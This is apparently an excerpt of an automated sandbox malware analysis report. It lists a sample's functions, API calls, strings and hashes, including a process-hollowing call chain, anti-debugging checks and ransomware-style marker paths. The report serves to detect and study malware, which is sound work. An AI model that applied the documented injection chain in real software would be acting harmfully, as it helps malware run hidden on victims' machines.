                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                                                                                        • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                                                                                                                                                        • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                                                                                                                                                        • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                                                                                                                        • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                                                                                        • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                                                                                                                                                        • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                                                                                                                                                          • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                                                                                                                                                                                                                          • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                                                                                                                                                                          • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                                                                                                                                                                          • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                                                                                                                                                                          • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                                                                                                          • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                                                                                                                                                          • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                                                                                                        • API String ID: 441990211-897913220
                                                                                                                                                                                                                                        • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                                                                                                                                                        • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .\crypto\err\err.c$unknown
                                                                                                                                                                                                                                        • API String ID: 0-565200744
                                                                                                                                                                                                                                        • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                                                                                                        • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0042419D
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DebuggerPresent_memset
                                                                                                                                                                                                                                        • String ID: i;B
                                                                                                                                                                                                                                        • API String ID: 2328436684-472376889
                                                                                                                                                                                                                                        • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                                                                                                                                                        • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                                                                                                                                                        • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                        • String ID: 8Q
                                                                                                                                                                                                                                        • API String ID: 3761405300-2096853525
                                                                                                                                                                                                                                        • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                                                                                                        • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                                                                                                                                                          • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00413C83
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                                                                                                                                                        • Opcode ID: 1bfec74ce1320eefcdc9ae333d00d9e9fa03295fad3003f73d6f4c9085cf79ee
                                                                                                                                                                                                                                        • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bfec74ce1320eefcdc9ae333d00d9e9fa03295fad3003f73d6f4c9085cf79ee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                                                                                        • API String ID: 2590308727-54166481
                                                                                                                                                                                                                                        • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                                                                                                                                                        • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __calloc_crt
                                                                                                                                                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                                                                                                                                        • API String ID: 3494438863-969893948
                                                                                                                                                                                                                                        • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                                                                                                                                                        • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 00480686
                                                                                                                                                                                                                                          • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                                                                                                                                                        • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset_raise
                                                                                                                                                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                                                                                                                                                        • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                                                                                                        • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                                                                                                                                                          • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                        • String ID: TeM
                                                                                                                                                                                                                                        • API String ID: 757275642-2215902641
                                                                                                                                                                                                                                        • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                                                        • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:38
                                                                                                                                                                                                                                        Total number of Limit Nodes:8
                                                                                                                                                                                                                                        execution_graph 33568 2870000 33571 2870630 33568->33571 33570 2870005 33572 287064c 33571->33572 33574 2871577 33572->33574 33577 28705b0 33574->33577 33580 28705dc 33577->33580 33578 28705e2 GetFileAttributesA 33578->33580 33579 287061e 33580->33578 33580->33579 33582 2870420 33580->33582 33583 28704f3 33582->33583 33584 28704ff CreateWindowExA 33583->33584 33585 28704fa 33583->33585 33584->33585 33586 2870540 PostMessageA 33584->33586 33585->33580 33587 287055f 33586->33587 33587->33585 33589 2870110 VirtualAlloc GetModuleFileNameA 33587->33589 33590 2870414 33589->33590 33591 287017d CreateProcessA 33589->33591 33590->33587 33591->33590 33593 287025f VirtualFree VirtualAlloc Wow64GetThreadContext 33591->33593 33593->33590 33594 28702a9 ReadProcessMemory 33593->33594 33595 28702e5 VirtualAllocEx NtWriteVirtualMemory 33594->33595 33596 28702d5 NtUnmapViewOfSection 33594->33596 33597 287033b 33595->33597 33596->33595 33598 2870350 NtWriteVirtualMemory 33597->33598 33599 287039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33597->33599 33598->33597 33600 28703fb ExitProcess 33599->33600 33602 27d6026 33603 27d6035 33602->33603 33606 27d67c6 33603->33606 33608 27d67e1 33606->33608 33607 27d67ea CreateToolhelp32Snapshot 33607->33608 33609 27d6806 Module32First 33607->33609 33608->33607 33608->33609 33610 27d603e 33609->33610 33611 27d6815 33609->33611 33613 27d6485 33611->33613 33614 27d64b0 33613->33614 33615 27d64f9 33614->33615 33616 27d64c1 VirtualAlloc 33614->33616 33615->33615 33616->33615

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 02870110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02870156
                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0287016C
                                                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,00000000), ref: 02870255
                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02870270
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02870283
                                                                                                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0287029F
                                                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 028702C8
                                                                                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 028702E3
                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02870304
                                                                                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0287032A
                                                                                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02870399
                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 028703BF
                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 028703E1
                                                                                                                                                                                                                                        • ResumeThread.KERNELBASE(00000000), ref: 028703ED
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 02870412
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 93872480-0
                                                                                                                                                                                                                                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
